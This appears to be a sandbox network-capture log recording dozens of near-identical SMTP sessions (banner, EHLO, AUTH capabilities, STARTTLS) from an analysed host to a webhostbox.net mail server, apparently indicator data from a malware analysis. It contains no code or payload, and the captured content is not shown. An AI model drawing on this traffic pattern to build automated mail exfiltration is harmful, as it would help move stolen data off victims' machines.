                                                                                                                      Jan 3, 2025 09:51:23.256565094 CET58750025208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:51:23.256745100 CET50025587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:51:23.403721094 CET58750025208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:51:26.869607925 CET58750026208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:21:26 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:51:26.869806051 CET50026587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:51:27.603071928 CET58750027208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:21:27 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:51:27.604507923 CET50027587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:51:27.755995035 CET58750027208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:51:27.756198883 CET50027587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:51:27.908657074 CET58750027208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:51:30.815475941 CET58750028208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:21:30 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:51:30.815598965 CET50028587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:51:30.961529016 CET58750028208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:51:30.961684942 CET50028587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:51:31.108414888 CET58750028208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:51:33.813133955 CET58750029208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:21:33 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:51:33.813719034 CET50029587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:51:33.965140104 CET58750029208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:51:33.966563940 CET50029587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:51:34.118309975 CET58750029208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:51:37.848728895 CET58750030208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:21:37 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:51:37.852746010 CET50030587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:51:38.004456997 CET58750030208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:51:38.008805037 CET50030587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:51:38.161606073 CET58750030208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:51:39.322983027 CET58750031208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:21:39 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:51:39.323160887 CET50031587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:51:39.473809958 CET58750031208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:51:39.474030972 CET50031587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:51:39.626089096 CET58750031208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:51:47.286485910 CET58750032208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:21:47 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:51:47.286618948 CET50032587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:51:47.432838917 CET58750032208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:51:47.433074951 CET50032587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:51:47.580137968 CET58750032208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:51:48.166548014 CET58750033208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:21:48 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:51:48.166785955 CET50033587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:51:48.315757036 CET58750033208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:51:48.315923929 CET50033587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:51:48.466420889 CET58750033208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:51:50.813690901 CET58750034208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:21:50 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:51:50.813841105 CET50034587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:51:50.963733912 CET58750034208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:51:50.963886976 CET50034587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:51:51.114996910 CET58750034208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:51:51.843810081 CET58750036208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:21:51 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:51:51.853715897 CET50036587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:51:52.001602888 CET58750036208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:51:52.015096903 CET50036587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:51:52.172005892 CET58750036208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:51:58.033663988 CET58750037208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:21:57 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:51:58.033920050 CET50037587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:51:58.183624983 CET58750037208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:51:58.184683084 CET50037587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:51:58.335205078 CET58750037208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:51:59.922391891 CET58750038208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:21:59 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:51:59.925828934 CET50038587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:52:00.077398062 CET58750038208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:52:00.080691099 CET50038587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:52:00.231586933 CET58750038208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:52:02.936289072 CET58750039208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:22:02 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:52:02.936450005 CET50039587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:52:03.086185932 CET58750039208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:52:03.086420059 CET50039587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:52:03.236447096 CET58750039208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:52:05.446013927 CET58750040208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:22:05 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:52:05.446206093 CET50040587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:52:05.594094038 CET58750040208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:52:05.594259024 CET50040587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:52:05.743007898 CET58750040208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:52:08.942553997 CET58750041208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:22:08 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:52:08.942713976 CET50041587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:52:09.088588953 CET58750041208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:52:09.088759899 CET50041587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:52:09.236792088 CET58750041208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:52:11.902400970 CET58750042208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:22:11 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:52:11.904666901 CET50042587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:52:12.050607920 CET58750042208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:52:12.050846100 CET50042587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:52:12.197386026 CET58750042208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:52:15.246123075 CET58750043208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:22:15 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:52:15.246265888 CET50043587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:52:15.395849943 CET58750043208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:52:15.395999908 CET50043587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:52:15.546190977 CET58750043208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:52:19.288222075 CET58750044208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:22:19 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:52:19.288391113 CET50044587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:52:19.439286947 CET58750044208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:52:19.439443111 CET50044587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:52:19.591068029 CET58750044208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:52:23.289037943 CET58750045208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:22:23 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:52:23.289247036 CET50045587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:52:23.439881086 CET58750045208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:52:23.440053940 CET50045587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:52:23.590686083 CET58750045208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:52:27.086095095 CET58750046208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:22:26 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:52:27.086291075 CET50046587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:52:27.233553886 CET58750046208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:52:27.233726025 CET50046587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:52:27.381139994 CET58750046208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:52:30.844957113 CET58750047208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:22:30 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:52:30.845081091 CET50047587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:52:30.990622997 CET58750047208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:52:30.990762949 CET50047587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:52:31.137634993 CET58750047208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:52:34.225075006 CET58750049208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:22:34 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:52:34.225235939 CET50049587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:52:34.370712996 CET58750049208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:52:34.370918989 CET50049587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:52:34.517735958 CET58750049208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:52:36.113801956 CET58750050208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:22:36 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:52:36.116906881 CET50050587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:52:36.268651009 CET58750050208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:52:36.268835068 CET50050587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:52:36.421544075 CET58750050208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:52:40.136955023 CET58750051208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:22:40 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:52:40.137120962 CET50051587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:52:40.283205986 CET58750051208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:52:40.286672115 CET50051587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:52:40.433439970 CET58750051208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:52:42.176693916 CET58750052208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:22:42 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:52:42.177994967 CET50052587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:52:42.324124098 CET58750052208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:52:42.324877024 CET50052587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:52:42.472071886 CET58750052208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:52:44.622983932 CET58750053208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:22:44 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:52:44.623195887 CET50053587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:52:44.769414902 CET58750053208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:52:44.769560099 CET50053587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:52:44.916857004 CET58750053208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:52:48.142061949 CET58750054208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:22:48 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:52:48.142240047 CET50054587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:52:48.305924892 CET58750054208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:52:48.310695887 CET50054587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:52:48.461174011 CET58750054208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:52:51.997035980 CET58750055208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:22:51 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:52:51.997503996 CET50055587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:52:52.146397114 CET58750055208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:52:52.154567957 CET50055587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:52:52.305747986 CET58750055208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:52:55.822397947 CET58750056208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:22:55 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:52:55.825232029 CET50056587192.168.2.5208.91.199.115EHLO 642294
